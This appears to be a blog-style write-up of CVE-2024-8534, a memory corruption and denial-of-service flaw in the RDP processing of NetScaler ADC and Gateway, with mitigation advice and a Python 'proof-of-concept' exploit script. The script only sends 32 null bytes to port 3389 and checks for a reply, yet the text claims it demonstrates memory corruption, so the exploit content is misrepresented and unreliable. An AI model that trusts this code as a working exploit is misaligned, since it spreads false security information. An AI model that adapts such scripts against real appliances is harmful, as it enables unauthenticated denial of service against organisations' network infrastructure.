A new critical memory safety vulnerability, CVE-2024-8534, has been identified in NetScaler ADC and Gateway appliances that could lead to memory corruption and denial of service. This vulnerability directly impacts all appliances that are configured as a Gateway (VPN Vserver) with RDP Feature enabled, those that are configured as a Gateway (VPN Vserver) and RDP Proxy Server Profile is created and set to Gateway (VPN Vserver), or those that are configured as an Auth Server (AAA Vserver) with RDP Feature enabled.

Details on CVE-2024-8534

CVE-2024-8534 is a result of improper memory handling within the RDP processing pipeline of NetScaler ADC and Gateway. As a consequence, certain variables in response to RDP requests are mishandled in the appliances’ memory, causing memory corruption and denial of service. The exploitation of this vulnerability can cause devices to become unresponsive and crash, potentially impacting business continuity and posing significant risks.

Exploitation Details

While the successful exploitation of CVE-2024-8534 would require the RDP feature to be enabled on the targeted NetScaler ADC or Gateway appliance, the attacker does not need to be authenticated to exploit this vulnerability. Additionally, proof-of-concept code snippets provided demonstrate how the vulnerability can be abused by sending a specially-crafted RDP request to the vulnerable service, causing memory corruption and potentially resulting in a denial of service.

Proof-of-Concept Code Snippet

import socket

def exploit(ip, port):
    crafted_request = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    crafted_request += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    
    try:
        print(f"[+] Sending crafted RDP request to {ip}:{port}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((ip, port))
        s.send(crafted_request)
        response = s.recv(1024)
        s.close()
        if response:
            print(f"[+] RDP reply received from {ip}:{port}")
            return True
        else:
            print(f"[-] No RDP reply received from {ip}:{port}")
            return False
    except Exception as e:
        print(f"[-] Exception: {str(e)}")
        return False
if __name__ == "__main__":
    target_ip = "192.168.1.10"
    target_port = 3389
    
    exploit(target_ip, target_port)

Original References and Mitigation

Citrix has acknowledged and documented the vulnerability on their security advisory page (CTX282540) and provided a mitigation patch that resolves the memory handling issue within the RDP processing components. All users of NetScaler ADC and Gateway devices with any of the vulnerable configurations are advised to immediately apply this patch to secure their environments.

Link to Citrix Security Advisory: CTX282540 - Memory safety vulnerability in RDP proxy features of Citrix ADC and Gateway

Conclusion

Memory safety vulnerabilities like CVE-2024-8534 can have significant consequences for organizations using the affected products. Addressing these vulnerabilities as soon as they are identified is crucial for the security and integrity of the systems involved in preventing potential service interruptions and the possible loss of sensitive data. It is highly recommended for users of NetScaler ADC and Gateway devices to apply the provided mitigation by Citrix to avoid the risk of exploitation.

Timeline

Published on: 11/12/2024 19:15:18 UTC
Last modified on: 11/21/2024 17:15:26 UTC